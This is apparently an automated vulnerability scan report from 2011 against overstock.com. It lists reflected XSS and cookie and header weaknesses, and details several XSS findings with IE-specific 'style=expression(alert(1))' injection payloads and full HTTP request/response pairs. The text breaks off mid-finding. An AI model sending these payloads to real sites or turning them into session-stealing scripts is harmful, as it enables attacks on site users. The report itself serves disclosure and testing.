XSS, Cross Site Scripting, overstock.com, Internet Explorer, Style Attribute

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by CloudScan Vulnerability Crawler at Sat Feb 12 10:46:57 CST 2011.


The DORK Report

Loading

1. Cross-site scripting (reflected)

1.1. http://www.overstock.com/Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html [IID parameter]

1.2. http://www.overstock.com/Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html [name of an arbitrarily supplied request parameter]

1.3. http://www.overstock.com/Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html [sec_iid parameter]

1.4. http://www.overstock.com/Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html [TID parameter]

1.5. http://www.overstock.com/Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html [name of an arbitrarily supplied request parameter]

1.6. http://www.overstock.com/Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html [IID parameter]

1.7. http://www.overstock.com/Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html [TID parameter]

1.8. http://www.overstock.com/Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html [name of an arbitrarily supplied request parameter]

1.9. http://www.overstock.com/Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html [sec_iid parameter]

1.10. http://www.overstock.com/Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html [IID parameter]

1.11. http://www.overstock.com/Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html [name of an arbitrarily supplied request parameter]

1.12. http://www.overstock.com/Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html [sec_iid parameter]

1.13. http://www.overstock.com/Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html [IID parameter]

1.14. http://www.overstock.com/Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html [name of an arbitrarily supplied request parameter]

1.15. http://www.overstock.com/Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html [sec_iid parameter]

1.16. http://www.overstock.com/Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html [IID parameter]

1.17. http://www.overstock.com/Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html [TID parameter]

1.18. http://www.overstock.com/Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html [name of an arbitrarily supplied request parameter]

1.19. http://www.overstock.com/Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html [sec_iid parameter]

1.20. http://www.overstock.com/Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html [TID parameter]

1.21. http://www.overstock.com/Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html [name of an arbitrarily supplied request parameter]

1.22. http://www.overstock.com/Home-Garden/Zebra-Print-Oval-Back-Chair/2552133/product.html [TID parameter]

1.23. http://www.overstock.com/Home-Garden/Zebra-Print-Oval-Back-Chair/2552133/product.html [name of an arbitrarily supplied request parameter]

2. Cookie scoped to parent domain

2.1. http://www.overstock.com/

2.2. http://www.overstock.com/Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html

2.3. http://www.overstock.com/Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html

2.4. http://www.overstock.com/Home-Garden/1/store.html

2.5. http://www.overstock.com/Home-Garden/Bedding-Bath/1/dept.html

2.6. http://www.overstock.com/Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html

2.7. http://www.overstock.com/Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html

2.8. http://www.overstock.com/Home-Garden/Chairs/2737/subcat.html

2.9. http://www.overstock.com/Home-Garden/Furniture/32/dept.html

2.10. http://www.overstock.com/Home-Garden/Furniture/Clearance,/clearance,/32/dept.html

2.11. http://www.overstock.com/Home-Garden/Furniture/Simmons,/brand,/32/dept.html

2.12. http://www.overstock.com/Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html

2.13. http://www.overstock.com/Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html

2.14. http://www.overstock.com/Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html

2.15. http://www.overstock.com/Home-Garden/Zebra-Print-Oval-Back-Chair/2552133/product.html

2.16. http://www.overstock.com/cart

2.17. http://www.overstock.com/Clothing-Shoes/Tailorbyrd-Mens-V-neck-Argyle-Wool-Sweater/4822008/product.html

2.18. http://www.overstock.com/community

2.19. http://www.overstock.com/intlcountryselect

2.20. http://www.overstock.com/myrecommendations

2.21. http://www.overstock.com/shipping-information/11971/static.html

3. Cookie without HttpOnly flag set

3.1. http://www.overstock.com/

3.2. http://www.overstock.com/Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html

3.3. http://www.overstock.com/Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html

3.4. http://www.overstock.com/Home-Garden/1/store.html

3.5. http://www.overstock.com/Home-Garden/Bedding-Bath/1/dept.html

3.6. http://www.overstock.com/Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html

3.7. http://www.overstock.com/Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html

3.8. http://www.overstock.com/Home-Garden/Chairs/2737/subcat.html

3.9. http://www.overstock.com/Home-Garden/Furniture/32/dept.html

3.10. http://www.overstock.com/Home-Garden/Furniture/Clearance,/clearance,/32/dept.html

3.11. http://www.overstock.com/Home-Garden/Furniture/Simmons,/brand,/32/dept.html

3.12. http://www.overstock.com/Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html

3.13. http://www.overstock.com/Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html

3.14. http://www.overstock.com/Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html

3.15. http://www.overstock.com/Home-Garden/Zebra-Print-Oval-Back-Chair/2552133/product.html

3.16. http://www.overstock.com/cart

3.17. http://www.overstock.com/Clothing-Shoes/Tailorbyrd-Mens-V-neck-Argyle-Wool-Sweater/4822008/product.html

3.18. http://www.overstock.com/community

3.19. http://www.overstock.com/intlcountryselect

3.20. http://www.overstock.com/myrecommendations

3.21. http://www.overstock.com/shipping-information/11971/static.html

4. Source code disclosure

4.1. http://www.overstock.com/

4.2. http://www.overstock.com/Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html

4.3. http://www.overstock.com/Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html

4.4. http://www.overstock.com/Clothing-Shoes/Tailorbyrd-Mens-V-neck-Argyle-Wool-Sweater/4822008/product.html

4.5. http://www.overstock.com/Home-Garden/1/store.html

4.6. http://www.overstock.com/Home-Garden/Bedding-Bath/1/dept.html

4.7. http://www.overstock.com/Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html

4.8. http://www.overstock.com/Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html

4.9. http://www.overstock.com/Home-Garden/Chairs/2737/subcat.html

4.10. http://www.overstock.com/Home-Garden/Furniture/32/dept.html

4.11. http://www.overstock.com/Home-Garden/Furniture/Clearance,/clearance,/32/dept.html

4.12. http://www.overstock.com/Home-Garden/Furniture/Simmons,/brand,/32/dept.html

4.13. http://www.overstock.com/Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html

4.14. http://www.overstock.com/Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html

4.15. http://www.overstock.com/Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html

4.16. http://www.overstock.com/Home-Garden/Zebra-Print-Oval-Back-Chair/2552133/product.html

4.17. http://www.overstock.com/cart

4.18. http://www.overstock.com/intlcountryselect

4.19. http://www.overstock.com/myrecommendations

4.20. http://www.overstock.com/shipping-information/11971/static.html

5. Cross-domain Referer leakage

5.1. http://www.overstock.com/

5.2. http://www.overstock.com/Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html

5.3. http://www.overstock.com/Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html

5.4. http://www.overstock.com/Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html

5.5. http://www.overstock.com/Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html

5.6. http://www.overstock.com/Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html

5.7. http://www.overstock.com/Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html

5.8. http://www.overstock.com/Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html

5.9. http://www.overstock.com/Home-Garden/Chairs/2737/subcat.html

5.10. http://www.overstock.com/Home-Garden/Furniture/Clearance,/clearance,/32/dept.html

5.11. http://www.overstock.com/Home-Garden/Furniture/Simmons,/brand,/32/dept.html

5.12. http://www.overstock.com/Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html

5.13. http://www.overstock.com/Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html

5.14. http://www.overstock.com/Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html

5.15. http://www.overstock.com/Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html

5.16. http://www.overstock.com/Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html

5.17. http://www.overstock.com/Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html

5.18. http://www.overstock.com/Home-Garden/Zebra-Print-Oval-Back-Chair/2552133/product.html

5.19. http://www.overstock.com/Home-Garden/Zebra-Print-Oval-Back-Chair/2552133/product.html

5.20. http://www.overstock.com/cart

5.21. http://www.overstock.com/community

5.22. http://www.overstock.com/intlcountryselect

5.23. http://www.overstock.com/shipping-information/11971/static.html

6. Cross-domain script include

6.1. http://www.overstock.com/

6.2. http://www.overstock.com/

6.3. http://www.overstock.com/

6.4. http://www.overstock.com/Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html

6.5. http://www.overstock.com/Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html

6.6. http://www.overstock.com/Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html

6.7. http://www.overstock.com/Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html

6.8. http://www.overstock.com/Clothing-Shoes/Tailorbyrd-Mens-V-neck-Argyle-Wool-Sweater/4822008/product.html

6.9. http://www.overstock.com/Home-Garden/1/store.html

6.10. http://www.overstock.com/Home-Garden/Bedding-Bath/1/dept.html

6.11. http://www.overstock.com/Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html

6.12. http://www.overstock.com/Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html

6.13. http://www.overstock.com/Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html

6.14. http://www.overstock.com/Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html

6.15. http://www.overstock.com/Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html

6.16. http://www.overstock.com/Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html

6.17. http://www.overstock.com/Home-Garden/Chairs/2737/subcat.html

6.18. http://www.overstock.com/Home-Garden/Chairs/2737/subcat.html

6.19. http://www.overstock.com/Home-Garden/Furniture/32/dept.html

6.20. http://www.overstock.com/Home-Garden/Furniture/Clearance,/clearance,/32/dept.html

6.21. http://www.overstock.com/Home-Garden/Furniture/Clearance,/clearance,/32/dept.html

6.22. http://www.overstock.com/Home-Garden/Furniture/Simmons,/brand,/32/dept.html

6.23. http://www.overstock.com/Home-Garden/Furniture/Simmons,/brand,/32/dept.html

6.24. http://www.overstock.com/Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html

6.25. http://www.overstock.com/Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html

6.26. http://www.overstock.com/Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html

6.27. http://www.overstock.com/Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html

6.28. http://www.overstock.com/Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html

6.29. http://www.overstock.com/Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html

6.30. http://www.overstock.com/Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html

6.31. http://www.overstock.com/Home-Garden/Zebra-Print-Oval-Back-Chair/2552133/product.html

6.32. http://www.overstock.com/Home-Garden/Zebra-Print-Oval-Back-Chair/2552133/product.html

6.33. http://www.overstock.com/Home-Garden/Zebra-Print-Oval-Back-Chair/2552133/product.html

6.34. http://www.overstock.com/cart

6.35. http://www.overstock.com/cart

6.36. http://www.overstock.com/community

6.37. http://www.overstock.com/community

6.38. http://www.overstock.com/intlcountryselect

6.39. http://www.overstock.com/myrecommendations

6.40. http://www.overstock.com/shipping-information/11971/static.html

6.41. http://www.overstock.com/shipping-information/11971/static.html



1. Cross-site scripting (reflected)  next
There are 23 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.overstock.com/Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html [IID parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html

Issue detail

The value of the IID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a6ae"style%3d"x%3aexpression(alert(1))"5554584d0bc was submitted in the IID parameter. This input was echoed as 1a6ae"style="x:expression(alert(1))"5554584d0bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html?IID=prod50728021a6ae"style%3d"x%3aexpression(alert(1))"5554584d0bc&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:40:30 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:40:30 GMT
Pragma: no-cache
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5072802|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:40:30 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:40:30 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 133100

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<input type="hidden" name="iid" value="prod50728021a6ae"style="x:expression(alert(1))"5554584d0bc"/>
...[SNIP]...

1.2. http://www.overstock.com/Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38835"style%3d"x%3aexpression(alert(1))"92b2bb611f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 38835"style="x:expression(alert(1))"92b2bb611f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html?38835"style%3d"x%3aexpression(alert(1))"92b2bb611f2=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:40:15 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:40:15 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5072802|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:40:15 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:40:15 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 132979

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<input type="hidden" name="38835"style="x:expression(alert(1))"92b2bb611f2" value="1"/>
...[SNIP]...

1.3. http://www.overstock.com/Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html [sec_iid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html

Issue detail

The value of the sec_iid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebfdc"style%3d"x%3aexpression(alert(1))"f9a06ddd836 was submitted in the sec_iid parameter. This input was echoed as ebfdc"style="x:expression(alert(1))"f9a06ddd836 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Buffalo-Womens-Blue-Plaid-Jacket/5072802/product.html?IID=prod5072802&sec_iid=74074ebfdc"style%3d"x%3aexpression(alert(1))"f9a06ddd836 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:41:07 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:41:07 GMT
Pragma: no-cache
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:41:07 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5072802|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:41:07 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 133100

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<input type="hidden" name="sec_iid" value="74074ebfdc"style="x:expression(alert(1))"f9a06ddd836"/>
...[SNIP]...

1.4. http://www.overstock.com/Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html [TID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html

Issue detail

The value of the TID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13288"style%3d"x%3aexpression(alert(1))"d30f6703708 was submitted in the TID parameter. This input was echoed as 13288"style="x:expression(alert(1))"d30f6703708 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html?TID=R:A1_113288"style%3d"x%3aexpression(alert(1))"d30f6703708 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:40:14 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:40:14 GMT
Pragma: no-cache
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5213639|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:40:14 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:40:14 GMT; Path=/
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 128397

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<input type="hidden" name="tid" value="R:A1_113288"style="x:expression(alert(1))"d30f6703708"/>
...[SNIP]...

1.5. http://www.overstock.com/Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Sean-John-Mens-3-Button-Suit/5213639/product.html

Issue detail

